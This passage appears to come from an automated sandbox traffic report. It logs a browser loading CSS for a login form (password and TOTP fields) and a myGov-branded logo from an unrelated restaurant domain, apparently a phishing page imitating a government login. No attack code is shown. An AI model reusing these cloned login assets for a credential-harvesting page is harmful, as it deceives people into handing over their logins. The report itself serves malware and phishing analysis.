                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://yungbucksbbq.com/portbiz/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: Rtg3-KdxTX-lS9kESubG2FfTJlM=tsocGLkuvgRkL9bBPewM-w-bWY0; 2Uww88WYh_COBe7pMTO4ioZTPfI=1735089781; Z958OV7wx8k8f46ZwkuzLQtUcy0=1735176181; Y-RnzAfelkfD1YFXnsePoVqq_wo=SAjd_BKZ5-FhtYibBEM7eJG8CRk; Wr9ERqNdD7myZ-CGhjmPxhLxwGA=ovZYm5WztmWNkG4wN79587VMEt0; yIKz5Z2V95SLGJr1RrkzB8w_oAw=24V5fd_SqGfynCsHmAJbl9ySndA; BHrbNRcajq8FC4XNkrvHx1cPp6M=1735089786; nPYTYev3FqKZHCvVaQ5DzSPcR8A=1735176186; AtgwaW3pNgQLbbw1puZhEbQd5Bo=5OQRJSKHWWav-JU40KaY81y8qb4
                                                        2024-12-25 01:23:13 UTC1070INHTTP/1.1 200 OK
                                                        Date: Wed, 25 Dec 2024 01:23:13 GMT
                                                        Content-Type: text/css
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        X-Content-Type-Options: nosniff
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 1; mode=block
                                                        X-XSS-Protection: 1; mode=block
                                                        Cache-Control: max-age=2592000
                                                        Pragma: public
                                                        Last-Modified: Wed, 11 Dec 2024 06:10:16 GMT
                                                        Expires: Wed, 22 Jan 2025 14:30:35 GMT
                                                        CF-Cache-Status: HIT
                                                        Age: 125558
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bF2VW7ssmYdWFbcFlFb89Vieok9dAisIPYsIJ0QFvM%2Fsaa9qdfx9cj1yP5PCWz43JrT%2BB1H8vgsU0EJ8BY6zuRojKcdP7LaPU%2F8%2Ffh9txtxnlwRJTP3P9lFnkF9l8ANsc1pI"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8f7506464a0443b3-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1552&min_rtt=1523&rtt_var=630&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1614&delivery_rate=1658148&cwnd=198&unsent_bytes=0&cid=ad66fa818e381019&ts=448&x=0"
                                                        2024-12-25 01:23:13 UTC299INData Raw: 37 63 34 38 0d 0a 2e 63 6f 6e 66 69 72 6d 2d 61 63 74 69 6f 6e 2e 62 6c 75 67 6f 76 7b 68 65 69 67 68 74 3a 35 30 70 78 3b 68 65 69 67 68 74 3a 33 2e 31 32 35 72 65 6d 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 35 34 61 37 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 36 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 35 34 61 37 65 7d 2e 63 6f 6e 66 69 72 6d 2d 61 63 74 69 6f 6e 2e 62 6c 75 67 6f 76 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 62
                                                        Data Ascii: 7c48.confirm-action.blugov{height:50px;height:3.125rem;text-decoration:none;background-color:#254a7e;border-radius:5px;color:#fff;font-size:16px;font-weight:500;min-width:160px;background-color:#254a7e}.confirm-action.blugov:hover{text-decoration:none;b
                                                        2024-12-25 01:23:13 UTC1369INData Raw: 61 63 74 69 6f 6e 2e 62 6c 75 67 6f 76 3a 66 6f 63 75 73 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 38 33 30 35 32 3b 6f 75 74 6c 69 6e 65 3a 34 70 78 20 73 6f 6c 69 64 20 23 31 38 33 30 35 32 3b 6f 75 74 6c 69 6e 65 2d 6f 66 66 73 65 74 3a 32 70 78 7d 2e 63 6f 6e 66 69 72 6d 2d 61 63 74 69 6f 6e 2e 62 6c 75 67 6f 76 3a 64 69 73 61 62 6c 65 64 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 61 30 61 30 61 33 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 52 6f 62 6f 74 6f 22 2c 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 22 4f 78 79 67 65 6e 22 2c 22 55 62 75 6e 74 75 22 2c 22 43 61 6e 74 61 72 65 6c 6c 22 2c 22 46 69 72 61 20 53 61 6e 73 22 2c 22 44 72 6f 69 64 20
                                                        Data Ascii: action.blugov:focus{background-color:#183052;outline:4px solid #183052;outline-offset:2px}.confirm-action.blugov:disabled{background-color:#a0a0a3}html{font-family:"Roboto",-apple-system,BlinkMacSystemFont,"Oxygen","Ubuntu","Cantarell","Fira Sans","Droid
                                                        2024-12-25 01:23:13 UTC1369INData Raw: 6c 20 2e 68 61 73 49 6e 66 6f 20 73 70 61 6e 2c 68 74 6d 6c 20 2e 68 61 73 49 6e 66 6f 20 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 68 74 6d 6c 20 2e 68 61 73 45 72 72 6f 72 7b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 34 70 78 20 73 6f 6c 69 64 20 23 64 63 33 35 34 38 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 68 74 6d 6c 20 2e 68 61 73 45 72 72 6f 72 20 70 2c 68 74 6d 6c 20 2e 68 61 73 45 72 72 6f 72 20 73 70 61 6e 7b 63 6f 6c 6f 72 3a 23 64 63 33 35 34 38 7d 68 74 6d 6c 20 2e 68 61 73 45 72 72 6f 72 20 70 2e 68 61 73 45 72 72 6f 72 2c 68 74 6d 6c 20 2e 68 61 73 45 72 72 6f 72 20 73 70 61 6e 2e 68 61 73 45 72 72 6f 72 7b 63 6f 6c 6f 72 3a 23 64 63 33 35 34 38 7d 68 74 6d 6c 20 2e 68 61 73 45 72 72
                                                        Data Ascii: l .hasInfo span,html .hasInfo a{font-size:16px}html .hasError{border-left:4px solid #dc3548;font-size:14px;font-weight:400}html .hasError p,html .hasError span{color:#dc3548}html .hasError p.hasError,html .hasError span.hasError{color:#dc3548}html .hasErr
                                                        2024-12-25 01:23:13 UTC1369INData Raw: 61 75 74 68 2d 67 72 69 64 2d 72 6f 77 20 61 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 68 65 61 64 65 72 20 2e 75 6e 61 75 74 68 2d 67 72 69 64 2d 72 6f 77 20 61 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 6f 75 74 6c 69 6e 65 2d 6f 66 66 73 65 74 3a 34 70 78 7d 2e 6c 6f 67 69 6e 2d 67 72 69 64 2d 63 6f 6c 75 6d 6e 7b 77 69 64 74 68 3a 31 30 30 25 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 36 34 30 70 78 29 7b 2e 75 6e 61 75 74 68 20 2e 64 69 67 69 74 61 6c 2d 69 64 2d 6c 6f 67 69 6e 2d 63 61 72 64 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 77 69 64 74 68 3a 31 30
                                                        Data Ascii: auth-grid-row a:hover{background-color:transparent}header .unauth-grid-row a:focus{outline:2px solid #000;outline-offset:4px}.login-grid-column{width:100%}@media screen and (min-width:640px){.unauth .digital-id-login-card{padding:0;max-width:100%;width:10
                                                        2024-12-25 01:23:13 UTC1369INData Raw: 6f 72 64 65 72 3a 32 70 78 20 73 6f 6c 69 64 20 23 33 31 33 31 33 31 7d 2e 6d 61 69 6e 2d 62 6c 6f 63 6b 20 61 2e 62 75 74 74 6f 6e 2d 6d 69 6e 6f 72 2e 62 75 74 74 6f 6e 3a 66 6f 63 75 73 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 6f 75 74 6c 69 6e 65 3a 34 70 78 20 73 6f 6c 69 64 20 23 31 38 33 30 35 32 3b 6f 75 74 6c 69 6e 65 2d 6f 66 66 73 65 74 3a 32 70 78 7d 2e 6d 61 69 6e 2d 62 6c 6f 63 6b 20 61 2e 62 75 74 74 6f 6e 2d 6d 69 6e 6f 72 2e 62 75 74 74 6f 6e 2e 65 72 72 6f 72 2d 62 75 74 74 6f 6e 2d 70 61 64 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 2e 36 65 6d 7d 2e 6d 61 69 6e 2d 62 6c 6f 63 6b 20 2e 62 75 74 74 6f 6e 2d 6d 61 69 6e 7b 68 65 69 67 68 74 3a 35 30 70 78 3b 68 65 69 67 68 74 3a 33 2e 31 32 35 72 65 6d 3b
                                                        Data Ascii: order:2px solid #313131}.main-block a.button-minor.button:focus{text-decoration:none;outline:4px solid #183052;outline-offset:2px}.main-block a.button-minor.button.error-button-padding{padding-top:.6em}.main-block .button-main{height:50px;height:3.125rem;
                                                        2024-12-25 01:23:13 UTC1369INData Raw: 65 74 3a 32 70 78 7d 61 2e 6d 61 72 67 69 6e 2d 6c 65 66 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 61 5b 64 61 74 61 2d 67 6f 2d 62 61 63 6b 2d 6c 69 6e 6b 3d 22 22 5d 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 65 72 72 6f 72 2d 61 72 72 6f 77 7b 68 65 69 67 68 74 3a 2e 37 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 23 64 69 67 69 74 61 6c 2d 69 64 2d 6d 6f 64 61 6c 2d 62 61 63 6b 67 72 6f 75 6e 64 2b 69 6d 67 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 64 69 67 69 74 61 6c 2d 69 64 2d 6d 61 69 6e 2d 6c 6f 67 69 6e 2d 63 61 72 64 2e 6f 76 65 72 72 69 64 65 7b 77 69 64 74 68 3a 31 30 30 25
                                                        Data Ascii: et:2px}a.margin-left{font-size:18px!important;margin-left:0!important}a[data-go-back-link=""]{font-size:18px!important}.error-arrow{height:.7em;margin-right:.5em}#digital-id-modal-background+img{display:none}.digital-id-main-login-card.override{width:100%
                                                        2024-12-25 01:23:13 UTC1369INData Raw: 6f 6d 3a 34 30 70 78 7d 2e 77 72 61 70 70 65 72 2d 6d 61 70 77 61 70 20 2e 68 72 2d 77 6f 72 64 20 73 70 61 6e 2c 2e 75 6e 61 75 74 68 20 2e 68 72 2d 77 6f 72 64 20 73 70 61 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 62 6c 61 63 6b 7d 2e 77 72 61 70 70 65 72 2d 6d 61 70 77 61 70 20 2e 70 61 73 73 77 6f 72 64 2d 68 65 6c 70 2c 2e 75 6e 61 75 74 68 20 2e 70 61 73 73 77 6f 72 64 2d 68 65 6c 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 63 6f 6c 6f 72 3a 23 36 36 36 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 77 72 61 70 70 65 72 2d 6d 61 70 77 61 70 20 66 6f 72 6d 20 6c 61 62 65 6c 2c 2e 77 72 61 70 70 65 72 2d 6d 61 70 77 61 70 20 66 6f 72 6d 20 2e 73 74 64 2d 4c 65 67 65 6e 64 2c 2e 75 6e 61 75 74 68 20 66 6f 72 6d 20 6c 61 62 65 6c
                                                        Data Ascii: om:40px}.wrapper-mapwap .hr-word span,.unauth .hr-word span{background-color:black}.wrapper-mapwap .password-help,.unauth .password-help{font-size:14px;color:#666;display:block}.wrapper-mapwap form label,.wrapper-mapwap form .std-Legend,.unauth form label
                                                        2024-12-25 01:23:13 UTC1369INData Raw: 61 70 70 65 72 2d 6d 61 70 77 61 70 20 66 6f 72 6d 20 6c 61 62 65 6c 5b 66 6f 72 3d 22 70 61 73 73 77 6f 72 64 52 65 74 79 70 65 64 22 5d 2c 2e 77 72 61 70 70 65 72 2d 6d 61 70 77 61 70 20 66 6f 72 6d 20 2e 73 74 64 2d 4c 65 67 65 6e 64 5b 66 6f 72 3d 22 70 61 73 73 77 6f 72 64 52 65 74 79 70 65 64 22 5d 2c 2e 75 6e 61 75 74 68 20 66 6f 72 6d 20 6c 61 62 65 6c 5b 66 6f 72 3d 22 70 61 73 73 77 6f 72 64 52 65 74 79 70 65 64 22 5d 2c 2e 75 6e 61 75 74 68 20 66 6f 72 6d 20 2e 73 74 64 2d 4c 65 67 65 6e 64 5b 66 6f 72 3d 22 70 61 73 73 77 6f 72 64 52 65 74 79 70 65 64 22 5d 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 7d 2e 77 72 61 70 70 65 72 2d 6d 61 70 77 61 70 20 66 6f 72 6d 20 6c 61 62 65 6c 5b 66 6f 72 3d 22 74 6f 74 70 61 6e 73 77 65 72 22 5d 2c 2e
                                                        Data Ascii: apper-mapwap form label[for="passwordRetyped"],.wrapper-mapwap form .std-Legend[for="passwordRetyped"],.unauth form label[for="passwordRetyped"],.unauth form .std-Legend[for="passwordRetyped"]{font-weight:600}.wrapper-mapwap form label[for="totpanswer"],.
                                                        2024-12-25 01:23:13 UTC1369INData Raw: 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 7d 2e 77 72 61 70 70 65 72 2d 6d 61 70 77 61 70 20 66 6f 72 6d 20 6c 61 62 65 6c 5b 66 6f 72 3d 22 31 22 5d 3a 66 6f 63 75 73 2c 2e 77 72 61 70 70 65 72 2d 6d 61 70 77 61 70 20 66 6f 72 6d 20 2e 73 74 64 2d 4c 65 67 65 6e 64 5b 66 6f 72 3d 22 31 22 5d 3a 66 6f 63 75 73 2c 2e 75 6e 61 75 74 68 20 66 6f 72 6d 20 6c 61 62 65 6c 5b 66 6f 72 3d 22 31 22 5d 3a 66 6f 63 75 73 2c 2e 75 6e 61 75 74 68 20 66 6f 72 6d 20 2e 73 74 64 2d 4c 65 67 65 6e 64 5b 66 6f 72 3d 22 31 22 5d 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 34 70 78 20 73 6f 6c 69 64 20 23 31 38 33 30 35 32 3b 6f 75 74 6c 69 6e 65 2d 6f 66 66 73 65 74 3a 32 70 78 7d 2e 77 72 61 70 70 65 72 2d 6d 61 70 77 61 70 20 66
                                                        Data Ascii: display:block;font-size:18px}.wrapper-mapwap form label[for="1"]:focus,.wrapper-mapwap form .std-Legend[for="1"]:focus,.unauth form label[for="1"]:focus,.unauth form .std-Legend[for="1"]:focus{outline:4px solid #183052;outline-offset:2px}.wrapper-mapwap f
                                                        2024-12-25 01:23:13 UTC1369INData Raw: 61 64 69 6f 22 5d 3a 66 6f 63 75 73 2c 2e 75 6e 61 75 74 68 20 66 6f 72 6d 20 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 34 70 78 20 73 6f 6c 69 64 20 23 31 38 33 30 35 32 3b 6f 75 74 6c 69 6e 65 2d 6f 66 66 73 65 74 3a 32 70 78 7d 2e 77 72 61 70 70 65 72 2d 6d 61 70 77 61 70 20 66 6f 72 6d 20 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 3a 63 68 65 63 6b 65 64 2b 6c 61 62 65 6c 3a 3a 62 65 66 6f 72 65 2c 2e 75 6e 61 75 74 68 20 66 6f 72 6d 20 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 3a 63 68 65 63 6b 65 64 2b 6c 61 62 65 6c 3a 3a 62 65 66 6f 72 65 7b 62 6f 72 64 65 72 3a 32 70 78 20 73 6f 6c 69 64 20 23 33 33 33 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 77 72 61 70 70 65 72 2d 6d 61 70 77 61 70 20 66 6f 72
                                                        Data Ascii: adio"]:focus,.unauth form [type="radio"]:focus{outline:4px solid #183052;outline-offset:2px}.wrapper-mapwap form [type="radio"]:checked+label::before,.unauth form [type="radio"]:checked+label::before{border:2px solid #333;display:block}.wrapper-mapwap for


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        13192.168.2.449765104.21.112.14432344C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-25 01:23:12 UTC1083OUTGET /portbiz/images/myGov-cobranded-logo-black.svg HTTP/1.1
                                                        Host: yungbucksbbq.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://yungbucksbbq.com/portbiz/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: Rtg3-KdxTX-lS9kESubG2FfTJlM=tsocGLkuvgRkL9bBPewM-w-bWY0; 2Uww88WYh_COBe7pMTO4ioZTPfI=1735089781; Z958OV7wx8k8f46ZwkuzLQtUcy0=1735176181; Y-RnzAfelkfD1YFXnsePoVqq_wo=SAjd_BKZ5-FhtYibBEM7eJG8CRk; Wr9ERqNdD7myZ-CGhjmPxhLxwGA=ovZYm5WztmWNkG4wN79587VMEt0; yIKz5Z2V95SLGJr1RrkzB8w_oAw=24V5fd_SqGfynCsHmAJbl9ySndA; BHrbNRcajq8FC4XNkrvHx1cPp6M=1735089786; nPYTYev3FqKZHCvVaQ5DzSPcR8A=1735176186; AtgwaW3pNgQLbbw1puZhEbQd5Bo=5OQRJSKHWWav-JU40KaY81y8qb4
                                                        2024-12-25 01:23:13 UTC1079INHTTP/1.1 200 OK
                                                        Date: Wed, 25 Dec 2024 01:23:13 GMT
                                                        Content-Type: image/svg+xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        X-Content-Type-Options: nosniff
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 1; mode=block
                                                        X-XSS-Protection: 1; mode=block
                                                        Cache-Control: max-age=5184000
                                                        Pragma: public
                                                        Last-Modified: Wed, 11 Dec 2024 06:10:16 GMT
                                                        Expires: Fri, 21 Feb 2025 14:30:35 GMT
                                                        CF-Cache-Status: HIT
                                                        Age: 125558
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sQK4qDffo7uxAusGR%2Bj3guQm%2Bm%2BXP7TgDpGvqps9ZnoJwnjMkabF80AG2K0gs0slWW7%2FQZ3JbI7kTdOvHOYC9aIfe%2FUzSG6IpmQg34wVXklpTkXmie7EK1E%2FvYW8LSYPHjsN"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8f7506464912727b-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1962&min_rtt=1959&rtt_var=742&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1661&delivery_rate=1468812&cwnd=232&unsent_bytes=0&cid=1b95ddef0960b59f&ts=448&x=0"
                                                        2024-12-25 01:23:13 UTC290INData Raw: 37 63 34 30 0d 0a 3c 73 76 67 20 69 64 3d 22 4c 61 79 65 72 5f 31 22 20 64 61 74 61 2d 6e 61 6d 65 3d 22 4c 61 79 65 72 20 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 36 39 33 2e 34 37 20 31 35 30 2e 35 37 22 3e 3c 64 65 66 73 3e 3c 73 74 79 6c 65 3e 2e 63 6c 73 2d 31 7b 66 69 6c 6c 3a 23 32 33 31 66 32 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 64 65 66 73 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 22 20 64 3d 22 4d 34 32 30 2c 32 32 2e 30 39 61 38 2e 37 36 2c 38 2e 37 36 2c 30 2c 30 2c 30 2d 38 2e 37 36 2c 38 2e 37 36 56 35 33 2e 35 31 4c 34 35 35 2c 39 37 2e 33 33 6c 2d 34 33 2e 38 32 2c 34 33 2e 38 31 76 32 32 2e 36 37 41 38 2e 37 35
                                                        Data Ascii: 7c40<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 693.47 150.57"><defs><style>.cls-1{fill:#231f20;}</style></defs><path class="cls-1" d="M420,22.09a8.76,8.76,0,0,0-8.76,8.76V53.51L455,97.33l-43.82,43.81v22.67A8.75
                                                        2024-12-25 01:23:13 UTC1369INData Raw: 34 32 36 2e 31 35 2c 32 34 2e 36 35 61 38 2e 37 35 2c 38 2e 37 35 2c 30 2c 30 2c 30 2d 36 2e 32 2d 32 2e 35 36 5a 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 33 20 2d 32 32 29 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 22 20 64 3d 22 4d 33 38 32 2e 33 31 2c 32 34 2e 36 33 61 38 2e 37 36 2c 38 2e 37 36 2c 30 2c 30 2c 30 2d 31 34 2e 39 33 2c 36 2e 32 32 56 31 36 33 2e 37 38 61 38 2e 37 36 2c 38 2e 37 36 2c 30 2c 30 2c 30 2c 31 35 2c 36 2e 31 38 6c 32 38 2e 38 31 2d 32 38 2e 38 32 56 35 33 2e 35 31 4c 33 38 32 2e 33 31 2c 32 34 2e 36 33 5a 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 33 20 2d 32 32 29 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 22 20 64 3d 22
                                                        Data Ascii: 426.15,24.65a8.75,8.75,0,0,0-6.2-2.56Z" transform="translate(-23 -22)"/><path class="cls-1" d="M382.31,24.63a8.76,8.76,0,0,0-14.93,6.22V163.78a8.76,8.76,0,0,0,15,6.18l28.81-28.82V53.51L382.31,24.63Z" transform="translate(-23 -22)"/><path class="cls-1" d="
                                                        2024-12-25 01:23:13 UTC1369INData Raw: 35 68 2d 2e 35 33 61 33 2e 33 33 2c 33 2e 33 33 2c 30 2c 30 2c 31 2d 2e 35 35 2e 36 37 2e 39 32 2e 39 32 2c 30 2c 30 2c 31 2d 2e 34 34 2e 31 2c 31 2e 34 36 2c 31 2e 34 36 2c 30 2c 30 2c 31 2d 2e 36 39 2d 2e 32 33 2c 35 2c 35 2c 30 2c 30 2c 30 2d 32 2e 32 39 2d 2e 35 38 2c 34 2e 32 33 2c 34 2e 32 33 2c 30 2c 30 2c 30 2d 33 2e 33 36 2c 31 2e 33 37 2c 34 2e 36 2c 34 2e 36 2c 30 2c 30 2c 30 2d 31 2e 31 34 2c 33 2c 34 2e 33 38 2c 34 2e 33 38 2c 30 2c 30 2c 30 2c 31 2c 32 2e 38 31 2c 31 36 2e 34 2c 31 36 2e 34 2c 30 2c 30 2c 30 2c 33 2e 30 38 2c 32 2e 35 32 2c 31 31 2e 34 32 2c 31 31 2e 34 32 2c 30 2c 30 2c 31 2c 32 2e 30 38 2c 31 2e 36 35 2c 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2c 2e 34 37 2c 31 2e 32 39 2c 31 2e 35 33 2c 31 2e 35 33 2c 30 2c 30 2c 31
                                                        Data Ascii: 5h-.53a3.33,3.33,0,0,1-.55.67.92.92,0,0,1-.44.1,1.46,1.46,0,0,1-.69-.23,5,5,0,0,0-2.29-.58,4.23,4.23,0,0,0-3.36,1.37,4.6,4.6,0,0,0-1.14,3,4.38,4.38,0,0,0,1,2.81,16.4,16.4,0,0,0,3.08,2.52,11.42,11.42,0,0,1,2.08,1.65,1.92,1.92,0,0,1,.47,1.29,1.53,1.53,0,0,1
                                                        2024-12-25 01:23:13 UTC1369INData Raw: 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 30 2c 31 2e 34 33 2e 35 33 2c 31 2e 35 35 2c 31 2e 35 35 2c 30 2c 30 2c 30 2c 31 2e 32 31 2d 2e 35 37 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 30 2c 2e 35 32 2d 31 2e 36 32 2c 32 2c 32 2c 30 2c 30 2c 30 2d 2e 35 34 2d 31 2e 35 31 2c 31 2e 37 37 2c 31 2e 37 37 2c 30 2c 30 2c 30 2d 31 2e 33 38 2d 2e 35 34 5a 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 33 20 2d 32 32 29 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 22 20 64 3d 22 4d 31 30 37 2e 38 35 2c 31 37 30 2e 32 38 61 2e 35 36 2e 35 36 2c 30 2c 30 2c 31 2d 2e 33 36 2d 2e 31 32 2e 37 39 2e 37 39 2c 30 2c 30 2c 31 2d 2e 32 33 2d 2e 33 38 2c 36 2c 36 2c 30 2c 30 2c 31 2d 2e 30 38 2d 31 2e 32 36 76 2d 35 2e 36 34 61
                                                        Data Ascii: .11,2.11,0,0,0,1.43.53,1.55,1.55,0,0,0,1.21-.57,2.39,2.39,0,0,0,.52-1.62,2,2,0,0,0-.54-1.51,1.77,1.77,0,0,0-1.38-.54Z" transform="translate(-23 -22)"/><path class="cls-1" d="M107.85,170.28a.56.56,0,0,1-.36-.12.79.79,0,0,1-.23-.38,6,6,0,0,1-.08-1.26v-5.64a
                                                        2024-12-25 01:23:13 UTC1369INData Raw: 2c 32 2e 34 2c 30 2c 30 2c 30 2d 31 2e 37 2d 34 2e 31 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 30 2d 31 2e 36 39 2e 37 31 2c 32 2e 33 2c 32 2e 33 2c 30 2c 30 2c 30 2d 2e 37 2c 31 2e 37 5a 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 33 20 2d 32 32 29 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 22 20 64 3d 22 4d 31 32 34 2e 33 31 2c 31 36 39 2e 30 35 56 31 35 37 2e 35 33 68 2d 36 2e 31 76 2e 35 38 61 31 2e 39 2c 31 2e 39 2c 30 2c 30 2c 31 2c 31 2e 33 39 2e 34 39 2c 33 2e 34 34 2c 33 2e 34 34 2c 30 2c 30 2c 31 2c 2e 33 35 2c 32 76 38 2e 34 39 61 33 2e 34 36 2c 33 2e 34 36 2c 30 2c 30 2c 31 2d 2e 33 31 2c 31 2e 39 2c 31 2e 39 2c 31 2e 39 2c 30 2c 30 2c 31 2d 31 2e 34 33 2e 35 36 76 2e 35 36 68 37 2e 38 35
                                                        Data Ascii: ,2.4,0,0,0-1.7-4.1,2.25,2.25,0,0,0-1.69.71,2.3,2.3,0,0,0-.7,1.7Z" transform="translate(-23 -22)"/><path class="cls-1" d="M124.31,169.05V157.53h-6.1v.58a1.9,1.9,0,0,1,1.39.49,3.44,3.44,0,0,1,.35,2v8.49a3.46,3.46,0,0,1-.31,1.9,1.9,1.9,0,0,1-1.43.56v.56h7.85
